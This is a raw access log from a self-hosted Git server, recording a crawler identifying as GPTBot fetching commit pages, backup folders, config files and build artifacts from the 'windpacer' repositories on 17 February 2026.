"/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" +[17/Feb/2026:13:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 14914] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 14904] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" [Client 74.7.227.38] [Length 11442] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 106880] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 191009] [Gzip 11.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" [Client 74.7.227.38] [Length 10121] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 106881] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 191755] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 11291] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 11940] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" [Client 74.7.227.38] [Length 9839] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" +[17/Feb/2026:13:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 74.7.227.38] [Length 14244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" +[17/Feb/2026:13:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 14391] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" +[17/Feb/2026:13:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" [Client 74.7.227.38] [Length 10403] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" +[17/Feb/2026:13:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 7499] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29829] [Gzip 12.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29840] [Gzip 12.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" +[17/Feb/2026:13:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10829] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" +[17/Feb/2026:13:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" +[17/Feb/2026:13:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" +[17/Feb/2026:13:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 11837] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" +[17/Feb/2026:13:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 74.7.227.38] [Length 9849] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" +[17/Feb/2026:13:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12785] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" +[17/Feb/2026:13:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" +[17/Feb/2026:13:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" +[17/Feb/2026:13:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11963] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 11344] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11522] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11649] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" [Client 74.7.227.38] [Length 10362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" +[17/Feb/2026:13:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12482] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" +[17/Feb/2026:13:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" +[17/Feb/2026:13:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 14358] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" +[17/Feb/2026:13:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" +[17/Feb/2026:13:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" +[17/Feb/2026:13:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" +[17/Feb/2026:13:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" +[17/Feb/2026:13:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" +[17/Feb/2026:13:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" +[17/Feb/2026:13:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" +[17/Feb/2026:13:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11238] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" +[17/Feb/2026:13:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" +[17/Feb/2026:13:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" +[17/Feb/2026:13:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 9831] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" +[17/Feb/2026:13:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 13252] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" +[17/Feb/2026:13:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" +[17/Feb/2026:13:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 